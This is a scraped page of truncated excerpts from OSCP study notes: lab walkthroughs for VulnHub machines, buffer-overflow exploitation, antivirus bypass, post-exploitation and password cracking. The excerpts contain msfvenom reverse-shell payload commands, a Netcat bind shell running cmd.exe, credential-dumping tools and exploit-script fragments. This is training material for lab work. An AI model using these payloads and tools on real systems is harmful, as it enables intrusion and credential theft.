OSCP Learning Notes - Kali Linux】的更多相关文章

Install Kali Linux : https://www.kali.org/ Common Commands: pwd man ls ls -la cd mkdir rmdir cp mv locate adduser su sudo echo cat nano chmod chmod 777 username ifconfig ping Starting and Stopping Services: HTTP /var/www/html apache2 SSH netstat -ant…
Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver Immunity Debuger - https://www.immunityinc.com/products/debugger/ Vulnserver Test 1. Open the vulnserver…
Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. In the Kali Linux: Find the devices in the intranet using the following command: netdiscover -i eth0 Scan the target kioptrix vm through n…
Common Tools Google Exploit-DB/Google Hacking DB WHOIS Netcraft theharvester Example: Google search:   site:cnn.com -site:www.cnn.com filetype:pdf More google search syntax canbe found on the site : https://support.google.com/websearch/answer/2466433…
Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concepts Understanding of basic Linux syntax A "Try Harder" attitude Modules: Introduction to Kali Linux Infromation Gatheing Scanning Enumeration Netc…
Antivirus Bypassing Tools: Kali Linux Detection Platform: https://www.virustotal.com/gui/home/upload 1. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -o shell1.exe 2. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT…
Java Applet Attacks Download virtual machines from the following website: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 1. Reset the IE Internet Security Level to Medium and Local intranet to Low 2. Add the target url to the excepti…
Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social-Engineering Attacks 3. Select 2)Website Attack Vectors. 4. Select 2) Metasploit Browser Exploit Method 5.Select 2)Site Cloner and set the options. 6.S…
 Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ #!/usr/bin/python import socket import os import sys host="192.168.2.135"…
Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap 10.0.0.0/24 -n -sP -sn 2. Scan the Kioptrix server and analyst the result. nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN…
Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of Kali Linux. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.XXX LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00" 2. Write th…
Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Download mona.py, and drop it into the 'OyCommands' file. 2. Open the vulnserver and Immnity Debugger and attach the vulnserver. 3. Execute mona modules 62…
SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website: https://www.vulnhub.com/entry/sickos-12,144/ 1. Scan the network to find the IP of SickOS server. The IP address of the SickOS is 10.0.0.31. netdisc…
DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website: https://www.vulnhub.com/entry/droopy-v02,143/ 1. Scan the network to find the IP address of the DroopyCTF server. netdiscover -r 10.0.0.0/ 2. Scan t…
BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: https://www.vulnhub.com/entry/btrsys-v21,196/ 1. Find the IP address of the BTRSys virtual machine. netdiscover -r 10.0.0.0/ 2. Perform the TCP/UDP s…
Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ The target server: Kioptirx Level 1.1(#2) 1. Discover the IP address of the target server. We…
Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali Linux, IE8-Win7 and Kioptrix Level 1 as showed in the following screenshoots. The Kali Linux should only talk to IE8-Win7 machine, and can not talk to…
Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the rockyou file. john --wordlist=/usr/share/wordlists/rockyou.txt windows john --show windows Conbine the files and save as unshadow. john --rules --wordlis…
Windows Post Exploitation Target Server: IE8-Win 7 VM 1. Download and upload the fgdump, PwDump7, wce and netcat into the IEUser folder on Windows 7. 2.Create the new user hackme with the password "password". 3.Locate fgdump and wce on Kali Linu…
Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l payloads All the payload type in Metasploit are showing as below: Framework Payloads ( total) [--payload <value>] ======================================…
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 1.Scan the target server using nmap. nmap -Pn -sS --stats-every 3m --max-scan-delay --defeat-rst-ratelim…
Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the module and options. search trans2open use exploit/linux/samba/trans2open set RHOST 10.0.0.13 show options exploit (3)Exploit the Kioptrix Level 1 server.(F…
File transfer type: 1. HTTP Transfer files through the website. 2.wget wget http://10.0.0.109/exploit.php 3.FTP python FTP (1)Install python FTP on the Kali Linux. pip3 install pyftpdlib (2)Move to the target folder, and start the FTP service. python…
Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on your server. http://www.dvwa.co.uk/ Install XAMPP and DVWA: 1. Install XAMPP on Windows server. And change the Apache http port to 82 and ssl port to 44…
Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscover 2.Browser the website http://10.0.0.21 through Firefox. 3. Click 'Test' . Then write the following script in the text box. <script>alter('XSS')<…
Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening port Reverse Shells Victim connects to attacker on listening port Basic usage: nc -nv IP Port Bind Shell: 1.On the Windows nc tool. -nvlp -e cmd.exe 2…
Local File Inclusion[LFI] Target Pentester Lab: Download from the following website: https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/ 1. Use netdiscover to find the IP of the target server.  The IP address of the targ…
Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/ 2. Write the Python test script using the badchars. #!/usr/bin/python import socket import…
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 2.Write the python test script. The shellcode is copied from the previous step. #!/usr…
DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command line arguments a…